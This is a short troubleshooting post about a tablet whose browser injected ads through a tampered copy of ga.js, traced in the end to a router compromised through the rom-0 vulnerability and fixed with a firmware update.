A friend of mine just handed me his tablet saying that everytime he open a webpage the browser redirects to several advertisement page (or, it "adds" advertisements on the page).
This happens both on Chrome and the stock browser.
I used USB debugging to look at the browser request and I think I found the culprit. When the browser loads http://www.google-analytics.com/ga.js the actual code is different. See this screenshot (the green line is where ga.js should terminate):
(and the added code goes on...)
I initially thought that some malware changed the hosts file and assigned a different IP to the google-analytics website, but this is not the case since when I visit the above link directly I see the correct JS code.
How can I track which app is doing this?
Answer
In the end I found out that the router was vulnerable to the rom-0 vulnerability (to test if your router is vulnerable, use this).
So, the issue was most likely caused by someone (or something) who had complete access to the admin interface of the router. I've now updated the firmware (and the test is now negative).
No comments:
Post a Comment